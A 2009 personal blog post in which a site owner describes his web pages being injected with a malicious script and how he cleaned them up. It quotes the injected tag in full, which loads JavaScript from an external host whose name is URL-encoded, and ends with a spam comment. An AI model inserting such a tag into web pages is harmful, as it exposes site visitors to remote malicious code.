25 Mar 2009 @ 8:03 AM 

I can’t access my blog http://aeric.poon.my and open the demo page http://demo.poon.my so I submit a ticket to the hosting support. I got a reply and I have been told that there are vulnerability in my scripts. All my ASP.NET and PHP pages are appended with the following lines:

<script language=javascript src=http://%35%31%6F%66%2E%6E%65%74/img.gif></script>

Try open the link in browser will decoded into this link:

http://www.51of.net.com/img.gif

but this page is invalid.

Try to change the link to:

http://www.51of.net

The page redirect to an under-construction China WAP service website.

I hope this issue would not happen again.

Warning: Please do not open the red colour links above. Opening the links at your on risk if you insist to.

Updates:

I received reply from the hosting customer support, Dan that no virus infection has taken place. Dan said the company will have the server patched and advice me to take some prevention steps such as impose more complex password and restore my code.

Updates:

I found that not only php and aspx files become the victim but html pages (*.html and *.htm) and classic ASP file also couldn’t escape from the vulnerability. I have deleted some of the unused files and folder. Redownload WordPress and reupload all the files doesn’t help much. There are some files from older version are still exists in the folder. Others files for add-on theme and plug-ins are also infected. So I need to check every folder and subfolder and remove the last line for each of the files. This is such a crazy work to do. I have also changed the FTP password and SQL database password with a more stronger one. I really hope I would not need to do this again.

For your information, all the files affected by this injection has the code at the bottom of the page. If it is an html page, the line of code is appended after the closing </html> tag. However the modified date of these files have not changed. I wonder how the hacker is so smart to able to access the server to change the files… How he can upload something and gain permission to execute some kind of command…? Does he really able to guess my FTP password through some kind of Brute-Force techniques…? Or just a simple trick to post some hacker message in my blog using eval() javascript function…? and without leaving any track…? However this incident has given me an experience to secure my domain.

Posted By: Aeric
Last Edit: 26 Mar 2009 @ 11:45 PM

EmailPermalink
Tags


 

Responses to this post » (2 Total)

 
  1. Aeric says:

    One of my colleagues said her forum website also suffered by the similar attack.

  2. Nazarplen says:

    I wish to thank you pertaining to your website. You’ve got a great deal of unique articles consequently the website is very helpful. I’m a university student in California state and I have got an critical term paper due immediately. I am just having problems and currently have writers-block at the moment as I am researching. Need someone to help
    me modify the free essay I ran across using the net analysis of college pressures essay. That report satisfies my personal prerequisites nevertheless is authored in an undesirable fashion and there are grammar blunders. Do you consider I would proceed? I’m simply just anxious for aid, hence any hint would be terrific.

Post a Comment

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>


 Last 50 Posts
 Back
Change Theme...
  • Users » 2
  • Posts/Pages » 129
  • Comments » 195
Change Theme...
  • VoidVoid « Default
  • LifeLife
  • EarthEarth
  • WindWind
  • WaterWater
  • FireFire
  • LightLight